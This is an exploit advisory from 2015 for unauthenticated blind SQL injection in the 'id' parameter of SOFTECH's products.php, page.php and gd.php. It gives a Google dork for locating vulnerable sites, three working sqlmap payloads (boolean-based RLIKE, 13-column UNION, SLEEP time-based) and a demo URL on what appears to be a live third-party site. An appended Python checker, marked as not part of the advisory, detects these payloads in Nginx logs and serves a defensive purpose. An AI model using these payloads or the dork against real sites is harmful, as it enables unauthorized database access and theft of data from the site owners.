
SOFTECH Multiple file Blind Sql Injection Vulnerability

Author: Shelesh Rauthan, Published: 13-06-2015
=========================================================
[+] Title :- SOFTECH Multiple file Blind Sql Injection Vulnerability
[+] Date :- 13 - June - 2015
[+] Vendor Homepage: :- http://www.softech.pk/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- inurl:"php?id=" "Developed By: SOFTECH"
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id
[+] Vulnerable File :- products.php, page.php, gd.php
[+] Affected Area(s) :- Entire admin, database, Server
=========================================================

[+] About :- Unauthenticated SQL Injection via "products.php", "page.php", "gd.php", causing an SQL error


[+] SQL vulnerable File location:- /home/DOMAIN/public_html/gd.php
/home/DOMAIN/public_html/products.php
/home/DOMAIN/public_html/page.php


[+] POC :- http://127.0.0.1/products.php?id=[SQL]'

The SQL injection vulnerability can be exploited by remote attackers without a web-application user account and without any user interaction.

Place: GET/POST
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: id=4' RLIKE (SELECT (CASE WHEN (7475=7475) THEN 4 ELSE 0x28 END)) AND 'jWbl'='jWbl

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: id=-4019' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f697771,0x50614c515968614f6e5a,0x716d617371),NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=4' AND SLEEP(5) AND 'xJxK'='xJxK
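As an added example that is not part of this advisory: a small Python checker that flags the three payload classes listed above (boolean-based RLIKE/CASE WHEN, UNION ... SELECT, and SLEEP-based time delay) in Nginx access-log lines for the three affected files, and also flags any id value that is not a plain integer. The log lines, client addresses and the non-numeric sample are constructed, not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit
# Affected files and parameter from the advisory; a legitimate id is a plain integer.
WATCHED_FILES = {"/products.php", "/page.php", "/gd.php"}
NUMERIC_ID = re.compile(r"^\d+$")
# One signature per payload class in the sqlmap output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b", re.I),
    "union": re.compile(r"\bUNION\b.{0,20}\bSELECT\b", re.I),
    "time-blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}
# Nginx combined log format: client - user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def classify_request(target):
    """Return (file, decoded id, matched classes), or None if the request is out of scope."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_FILES:
        return None
    ids = parse_qs(parts.query, keep_blank_values=True).get("id")
    if not ids:
        return None
    raw = unquote_plus(ids[0])  # parse_qs decoded once; decode again for double-encoded payloads
    hits = [name for name, rx in SIGNATURES.items() if rx.search(raw)]
    if not hits and not NUMERIC_ID.match(raw):
        hits.append("non-numeric-id")  # anything but a bare integer is suspect for this parameter
    return parts.path, raw, hits

def scan_log(lines):
    # Return (client ip, file, classes) for each line whose id parameter looks injected.
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group("method") in ("GET", "POST"):
            found = classify_request(m.group("target"))
            if found and found[2]:
                alerts.append((m.group("ip"), found[0], found[2]))
    return alerts

# Constructed sample lines (not real traffic); the payloads mirror the advisory, URL-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jun/2015:10:00:01 +0000] "GET /products.php?id=14 HTTP/1.1" 200 512 "-" "Mozilla"',
    '203.0.113.5 - - [13/Jun/2015:10:00:02 +0000] "GET /products.php?id=4%27%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7475%3D7475)%20THEN%204%20ELSE%200x28%20END))%20AND%20%27jWbl%27%3D%27jWbl HTTP/1.1" 200 512 "-" "sqlmap"',
    '203.0.113.5 - - [13/Jun/2015:10:00:03 +0000] "GET /page.php?id=-4019%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 HTTP/1.1" 200 700 "-" "sqlmap"',
    '203.0.113.5 - - [13/Jun/2015:10:00:04 +0000] "GET /gd.php?id=4%27%20AND%20SLEEP(5)%20AND%20%27xJxK%27%3D%27xJxK HTTP/1.1" 200 512 "-" "sqlmap"',
    '198.51.100.9 - - [13/Jun/2015:10:00:05 +0000] "GET /products.php?id=8%27 HTTP/1.1" 500 120 "-" "Mozilla"',
]
if __name__ == "__main__":
    for ip, path, classes in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(classes)}")
```

Requests to files outside the three affected scripts are ignored, so the checker is scoped to what the advisory reports; widen WATCHED_FILES if other scripts take the same id parameter.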


[+] DEMO :- http://sadapak.com/gd.php?id=4

=========================================================
